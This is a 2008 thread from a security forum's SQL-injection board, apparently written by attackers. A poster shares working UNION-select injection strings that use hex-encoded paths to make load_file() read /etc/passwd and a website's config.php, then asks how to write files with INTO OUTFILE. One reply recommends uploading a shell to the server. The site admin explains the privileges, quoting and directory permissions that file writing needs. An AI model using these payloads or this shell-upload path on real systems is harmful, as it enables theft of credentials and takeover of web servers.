|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 57
Members: 0
Total: 57
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
into outfile help ! |
|
Posted: Thu May 08, 2008 4:00 pm |
|
|
w0rm |
Active user |
|
|
Joined: Feb 22, 2008 |
Posts: 49 |
|
|
|
|
|
|
|
Hi , i want to know how i can using into outfile in this cas , i can read file by load_file , looking plz :
/etc/passwd
Code: | -1/**/UNION/**/select/**/null,load_file(0x2f6574632f706173737764)/**/FROM/**/mysql.user/* |
working
/home/www/www.xxx.com/config.php
Code: | -1/**/UNION/**/select/**/null,load_file(0x2f686f6d652f7777772f7777772e7878782e636f6d2f636f6e6669672e706870)/**/FROM/**/mysql.user/* |
working
So , how i can upload a file with 'INTO OUTFILE' in this cas . [ HEX ] |
|
|
|
|
Posted: Thu May 08, 2008 6:18 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Beter choice IMHO is to find some admin panel ...etc with load_file and upload shell on server. |
|
|
|
|
|
|
|
|
Posted: Fri May 09, 2008 1:40 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
If you can do "load_file()", then you have FILE privileges. So "INTO OUTFILE" is probably available. Another mitigating factor is "magic_quotes". If php will make single quotes look like "\'", then you are in trouble. And one more thing - file permissions. You can only create files, not overwrite old ones, and you need to have write permissions to target directory. And - usually that target directory must be accessible via HTTP request.
So - what's stopping you from trying things out and running some tests? Read sql injection tutorials and whitepapers. And mysql manual of course. All the information is there. Try it, and if you have problems, then let me know and post here associated error messages (if any). |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|